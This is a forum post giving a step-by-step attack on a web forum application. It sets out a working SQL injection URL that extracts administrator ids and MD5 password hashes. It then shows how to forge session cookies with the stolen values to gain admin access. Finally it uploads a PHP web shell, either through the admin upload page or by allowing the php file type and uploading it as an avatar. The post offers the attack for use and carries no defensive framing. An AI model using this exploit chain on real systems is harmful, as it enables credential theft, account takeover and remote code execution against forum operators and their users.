Sm0ke |
Moderator |
|
|
Joined: Nov 25, 2006 |
Posts: 141 |
Location: Finland |
|
|
|
|
|
|
Code: | 1. Register at forum.
2. Post a message in any forum.
3. Open the url, replacing "24" with the id of your post.
Code:
http://target/editpost.php?id=24+union+select+concat(char(58,58,58),id,char(58,58,58),pass,char(58,58,58)),id+from+pmf_user+where+group_id=1+order+by+1+asc+/*
4. The id and md5 hash should appear in the textarea on this page. It will look like:
:::1:::21232f297a57a5a743894a0e4a801fc3:::
This uses the table prefix "pmf_". If you have trouble getting the hash and suspect a problem with table prefix, simply look at the error at the top of the page and you will see in their sql what prefix they are using.
After the hash:
1. If you take a look at your cookie after logging in, you will see pmfUserId and pmfPass. This can be replaced with the user id and md5 hash you retrieved.
2. After changing the cookie, go to /admin/upload.php. You can try to upload a file here, the location will be http://target/forum/images/default/evil.php.
3. Some times the upload.php doesn't work because of directory permissions. In that case, go to the admin panel, click on Dateitypen->hinzuf?gen in the nav window.
4. Add new datatype:
Benutzergruppe: leave as -
Dateiendung: php
Icon: leave blank, or put in %images%/image.gif
max. Dateigr??e: 500
Dateianhang: check ja
Avatar: check ja
and submit.
5. Log in as your user. Go to profile and upload php as avatar, it can be any php file it doesn't need to be a jpg or named .jpg.
6. The shell will be uploaded at http://target/forum/images/avatar/$id.php where $id is your user id. |
|
|